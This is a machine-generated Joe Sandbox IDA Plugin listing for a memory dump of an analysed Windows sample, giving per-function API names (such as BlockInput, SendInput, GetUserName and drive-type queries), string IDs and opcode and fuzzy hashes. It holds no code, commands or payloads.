                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: a/p$am/pm
                                                            • API String ID: 0-3206640213
                                                            • Opcode ID: d269495295c1493308ce62522ec6a5b0fa2a34529254b4e83c29fdea4e24a2f2
                                                            • Instruction ID: 8081b53937d49d595853826dd7cb25c6a8e78c1a1b113db7a54b6b0ac1e2dd36
                                                            • Opcode Fuzzy Hash: d269495295c1493308ce62522ec6a5b0fa2a34529254b4e83c29fdea4e24a2f2
                                                            • Instruction Fuzzy Hash: 57E19F22A0A6D285EF64AF25A1545FDB3A2FF45780FD84132EA1F46684DF3DED58C320
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Variable is not of type 'Object'.
                                                            • API String ID: 0-1840281001
                                                            • Opcode ID: 085062051d8c6d05dddc6329c8930327e2f409664b9aa2ab8e8b8fd8cd37859f
                                                            • Instruction ID: 2cda47ff6d5a2a3f2615826a5d414a9065255813cd7536e4f7b46f26b3d3e848
                                                            • Opcode Fuzzy Hash: 085062051d8c6d05dddc6329c8930327e2f409664b9aa2ab8e8b8fd8cd37859f
                                                            • Instruction Fuzzy Hash: AC528172A086828AFF51FF64E1901FCA3A1EB45788FD84135DE0D67A85EF38E545CB60
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: no error
                                                            • API String ID: 0-1106124726
                                                            • Opcode ID: daf22cd7e491b1831c7a4d7ece73bd53412841c2595e7b00d29937dbea50e64a
                                                            • Instruction ID: 843a00f6da9e77d96922262ccb3afcd6e924c9d847952f4169a65ce0faca63eb
                                                            • Opcode Fuzzy Hash: daf22cd7e491b1831c7a4d7ece73bd53412841c2595e7b00d29937dbea50e64a
                                                            • Instruction Fuzzy Hash: 9D129C72A087918AEB24DF65E4402EDB3A4FB44748F944136EF8E57B94EF38E940DB50
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: InputSend
                                                            • String ID:
                                                            • API String ID: 3431551938-0
                                                            • Opcode ID: f56fcc02370cedd2e246ff2304cc88798786294839e2fbad01620a5262f8ee40
                                                            • Instruction ID: 1ee409db9143244a4bb174b8456367068ecfa49cd1cfaa14f355862491a55923
                                                            • Opcode Fuzzy Hash: f56fcc02370cedd2e246ff2304cc88798786294839e2fbad01620a5262f8ee40
                                                            • Instruction Fuzzy Hash: 67F09A669186C0C6D3209F11E4807AAB7A1F759789F846119EB8A47B64CF3EC50A9F14
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: mouse_event
                                                            • String ID:
                                                            • API String ID: 2434400541-0
                                                            • Opcode ID: 6674be8b64349246c9dd3b232f8eab8a138cd1fe159d5217082064005974ec36
                                                            • Instruction ID: ff00121248b84596bd45c3d34748a85260822c9d8103101b938d6d28feaf22f0
                                                            • Opcode Fuzzy Hash: 6674be8b64349246c9dd3b232f8eab8a138cd1fe159d5217082064005974ec36
                                                            • Instruction Fuzzy Hash: E0E092A5D081C3D2FA6C3538A51A7F4B251AB91344ED80130C60901AECCF0E9D069530
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: BlockInput
                                                            • String ID:
                                                            • API String ID: 3456056419-0
                                                            • Opcode ID: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
                                                            • Instruction ID: 4a65bd6a909a4d4af1ef0a295f1b88159974711d068477c34be9fd86269713f1
                                                            • Opcode Fuzzy Hash: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
                                                            • Instruction Fuzzy Hash: 29E06532B1428286EF48AB75F0842B9A2A0AB84B84F985035DA1D83385EF7CD4908710
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: NameUser
                                                            • String ID:
                                                            • API String ID: 2645101109-0
                                                            • Opcode ID: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                            • Instruction ID: 98ca5999cbb960bcfb10255821181a06331321f2dc481505e906ce212e079d7f
                                                            • Opcode Fuzzy Hash: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                            • Instruction Fuzzy Hash: B5C01271A146D2D9EB60DF24E8C41DC3330F71031CFC00021E60E4E4AC9F789248C310
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: 0
                                                            • API String ID: 3215553584-4108050209
                                                            • Opcode ID: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
                                                            • Instruction ID: 313743ddf7f11aa14d1596b4d3f33ac456570f1009ff7c9e2e91f070bee2d6f1
                                                            • Opcode Fuzzy Hash: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
                                                            • Instruction Fuzzy Hash: 1571D625A0C2C246FE6CFA2571402FEE7909F41B49FAC4575DD0887EE5CF2EE8458B61
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            • Opcode ID: 8ef2f154a14ec1b0ccb9e07fbea3c42fb53e9d7c32ed8692c170a0c832183cc5
                                                            • Instruction ID: 50abb8f43715b7a09f787a1c3b5c4033014372a334b238dff159edbb6b543ad4
                                                            • Opcode Fuzzy Hash: 8ef2f154a14ec1b0ccb9e07fbea3c42fb53e9d7c32ed8692c170a0c832183cc5
                                                            • Instruction Fuzzy Hash: CF41B162715B8586EE04DF2AE9142E9B3A1B748FD0B8DA036DE0D87754EF3CD946C340
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d8796869ba0ff200981f3c8b4e50b33a6e54c2853832a264e2eb0800a33b39bf
                                                            • Instruction ID: 13499853c9b4a8fdc2004d9d96a7db8bc4fcb5bb44fb9eb2d95d0ce5b02f8c93
                                                            • Opcode Fuzzy Hash: d8796869ba0ff200981f3c8b4e50b33a6e54c2853832a264e2eb0800a33b39bf
                                                            • Instruction Fuzzy Hash: BF52A332A0D6C286EE24EB29E0586FCA365EF45B88F9D4535CA5E47681DF3CE440CB60
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::cancel_current_task
                                                            • String ID:
                                                            • API String ID: 118556049-0
                                                            • Opcode ID: 37be43e2159a7a5f12ed6e638a5f9fbb193c8301d54815e0f563e4172ea09bfa
                                                            • Instruction ID: 01c6fe968f8f2f174231f6654ec65ea3693e9dc118e5cd065181ef0105fd1432
                                                            • Opcode Fuzzy Hash: 37be43e2159a7a5f12ed6e638a5f9fbb193c8301d54815e0f563e4172ea09bfa
                                                            • Instruction Fuzzy Hash: EE526B72F0868289EF10EFA5E1542FCA3A1AB84B98F984235DE1E57BD5DF39E405C350
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a2428b1a41b9dab0837923aee02f6dd20d06634fc1108aa9b555873352bd9b52
                                                            • Instruction ID: 35294d84bd485416fcf5454b03bd1f73ab522f0454a8457688ebf8b4054096d0
                                                            • Opcode Fuzzy Hash: a2428b1a41b9dab0837923aee02f6dd20d06634fc1108aa9b555873352bd9b52
                                                            • Instruction Fuzzy Hash: 68429D32B0878286EF10EB25E5842EDB7A1FB84798FA84135DE5D47B99EF39E441C710
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                            • Instruction ID: 7e4dbf700f5d1b2d61dc67d0e2585f5731361bfb060f9fbcf4b4062bd78d0a0d
                                                            • Opcode Fuzzy Hash: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                            • Instruction Fuzzy Hash: F2424121D29ECB85EB53EB35B9115B1A324BF523C0F898333E90E76661DF2CA5478630
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 8d8f3e37eadd19746a70c291c5831625e20ba123285d38ae931568fef80f1606
                                                            • Instruction ID: 81b49155f55735075f551b1baa10dbc8387413d894095d5a6af860438cf5fe3c
                                                            • Opcode Fuzzy Hash: 8d8f3e37eadd19746a70c291c5831625e20ba123285d38ae931568fef80f1606
                                                            • Instruction Fuzzy Hash: A2711E22E0C2C246FF68A925B6907F9E281AF41374F9C0634DA5D876D1DF7DEC419722
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
                                                            • Instruction ID: 5a2059bd4b6a6c421814b15b449608bcfb5bd262e9d3eb30ee31478a25bc8783
                                                            • Opcode Fuzzy Hash: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
                                                            • Instruction Fuzzy Hash: 9521D173A2448586EB08DF75E8526E973A5A360708F88C13AC52B832C4CE3CE904CB90
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                            • Instruction ID: c31a06a7721e7ba095d49154bc98170d698b36a34c66b2a9b23f7832048fea90
                                                            • Opcode Fuzzy Hash: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                            • Instruction Fuzzy Hash: 5DF04FB1B1D2958ADBA5DF2CB842A6DB790E708380FD48039DA8D83E44DE3D94619F14
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                            • Instruction ID: 1831ce4ec1389c6950ffb7b22eb9136e430eaea6443f32f4fe5091cf56274e50
                                                            • Opcode Fuzzy Hash: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                            • Instruction Fuzzy Hash: 59A0026690ECC2D4EF08EB00F8A00B0A330EF50321BDA1532D11D418619F3CA481C330
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 3521893082-0
                                                            • Opcode ID: ef7366886db55824d460b1c50baab5321c9adbfaa8eab0a2c69b3322450da6b5
                                                            • Instruction ID: 99ba20bc434a76459926c1d3bdbbfc4e701ca8b27ba447f856f14e53eaaa88ac
                                                            • Opcode Fuzzy Hash: ef7366886db55824d460b1c50baab5321c9adbfaa8eab0a2c69b3322450da6b5
                                                            • Instruction Fuzzy Hash: D1A1A532F0468286EF14AB61A8846BC7B61BF48BA4F894334DF2E53BD4DF3C94458360
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                            • API String ID: 2907320926-4222207086
                                                            • Opcode ID: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                            • Instruction ID: 626a9f46f7f1d1a5fa2573089af5e1f836edfb8fa11f37c40b3ab5828aef81da
                                                            • Opcode Fuzzy Hash: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                            • Instruction Fuzzy Hash: 56B14E61F0CE82D0EE64FF25E8481FCA7A1BB40B84BED4135D90E47699EF2DE9458360
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 1996641542-0
                                                            • Opcode ID: be73899effbf77ebd9d54faa89356d5f551f326618c8bd974714f6933a768820
                                                            • Instruction ID: f13e1b86b1090a80bc30bfa5fd211202d19456154d9565722f3c61005423e4c5
                                                            • Opcode Fuzzy Hash: be73899effbf77ebd9d54faa89356d5f551f326618c8bd974714f6933a768820
                                                            • Instruction Fuzzy Hash: 6E719336A08A8187EB24EB11F8846BAB761FB89BA0F454335DE5E43B94DF7CD445C720
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
